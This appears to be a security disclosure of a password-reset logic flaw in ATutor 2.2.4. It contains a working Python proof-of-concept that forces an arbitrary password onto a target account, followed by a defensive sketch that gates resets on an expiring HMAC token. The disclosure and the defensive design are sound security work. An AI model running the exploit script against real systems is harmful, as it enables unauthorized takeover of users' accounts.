Description
In version 2.2.4, it's currently possible to arbitrarily change the user password to an attacker-controlled value. This is caused by a logic flaw when g, id, h, form_password_hidden, and form_change are all set. A CVE has been submitted for the issue. PoC is below. Please let me know if you have questions or concerns regarding this:
```python
import hashlib, sys, requests

def force_password_change(ip, id, password):
    data = {
        "g" : 9999999999,
        "id" : id,
        "h" : 0,
        "form_password_hidden" : hashlib.sha1(password).hexdigest(),
        "form_change" : ""
    }
    url = "http://%s/ATutor/password_reminder.php" % (ip)
    print("(*) Issuing password reset to URL: %s" % url)
    requests.post(url, data)

def main():
    if len(sys.argv) < 3:
        print('(+) Utility for changing a target users password given the database row number.')
        print('(+) If no password is specified, LetMeIn will be used. Default index for teacher account is 1.')
        print('(+) usage: %s <index> <target_ip> [password]' % sys.argv[0])
        print('(+) eg: %s 1 192.168.1.2' % sys.argv[0])
        sys.exit(-1)
    id = sys.argv[1]
    ip = sys.argv[2]
    password = "LetMeIn"
    if len(sys.argv) > 3:
        password = sys.argv[3]
    force_password_change(ip, id, password)
    print("(+) Operation complete. Manually test to see if the password changed.")

if __name__ == "__main__":
    main()
```
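The report above describes a reset handler that changes the password as soon as the expected form fields are present. The sketch below is an added example of the check a defender wants in that position; it is not ATutor's code and does not claim to show how `password_reminder.php` is implemented. It assumes a hypothetical handler that receives the same field names (`id`, `h`, `form_password_hidden`, `form_change`), treats `h` as a reset token, and only proceeds when that token is an unexpired HMAC bound to the requested user id and a server-side secret. A request shaped like the PoC (numeric `id`, `h` set to `0`, all fields present) is rejected because the token does not verify, while a token the server itself issued for that id is accepted within its lifetime.

```python
import hashlib
import hmac

# Assumed server-side values for this example only (not ATutor's configuration).
SECRET = b"server-side-reset-secret-assumed-for-this-example"
TOKEN_TTL = 3600  # seconds a reset token stays valid (assumed)


def issue_reset_token(user_id: int, issued_at: int, secret: bytes = SECRET) -> str:
    """Build a token "<issued_at>.<hmac>" bound to the user id and issue time.

    Only the server, which holds `secret`, can produce a token that verifies.
    """
    msg = f"{user_id}:{issued_at}".encode()
    mac = hmac.new(secret, msg, hashlib.sha256).hexdigest()
    return f"{issued_at}.{mac}"


def token_is_valid(user_id: int, token: str, now: int,
                   secret: bytes = SECRET, ttl: int = TOKEN_TTL) -> bool:
    """True only if `token` was issued for `user_id` and has not expired."""
    try:
        issued_str, mac = token.split(".", 1)
        issued_at = int(issued_str)
    except (ValueError, AttributeError):
        # Malformed token (e.g. the literal "0" from the PoC): never accept.
        return False
    if issued_at > now or now - issued_at > ttl:
        return False
    expected = hmac.new(secret, f"{user_id}:{issued_at}".encode(),
                        hashlib.sha256).hexdigest()
    # Constant-time comparison so the check does not leak the expected MAC.
    return hmac.compare_digest(expected, mac)


def handle_password_change(form: dict, now: int) -> str:
    """Hypothetical reset handler: presence of the fields is not enough.

    Returns a short status string; a real handler would only update the
    stored hash for `user_id` on the "changed" path.
    """
    required = ("id", "h", "form_password_hidden", "form_change")
    if not all(k in form for k in required):
        return "rejected: missing fields"
    try:
        user_id = int(form["id"])
    except (TypeError, ValueError):
        return "rejected: bad id"
    if not token_is_valid(user_id, str(form["h"]), now):
        return "rejected: invalid or expired token"
    # Update of the stored password hash for user_id would happen here.
    return "changed"


# Constructed request in the shape the report describes: every field set,
# but `h` carries no token the server ever issued.
POC_SHAPED_REQUEST = {
    "g": 9999999999,
    "id": 1,
    "h": 0,
    "form_password_hidden": hashlib.sha1(b"LetMeIn").hexdigest(),
    "form_change": "",
}


if __name__ == "__main__":
    print(handle_password_change(POC_SHAPED_REQUEST, now=1500))
    token = issue_reset_token(user_id=1, issued_at=1000)
    legit = dict(POC_SHAPED_REQUEST, h=token)
    print(handle_password_change(legit, now=1500))
```

The design point is that the gate is a verifiable, user-bound, expiring secret rather than the mere presence of `form_change` and `form_password_hidden`; binding the token to the id also means a token issued for one account cannot be replayed against another.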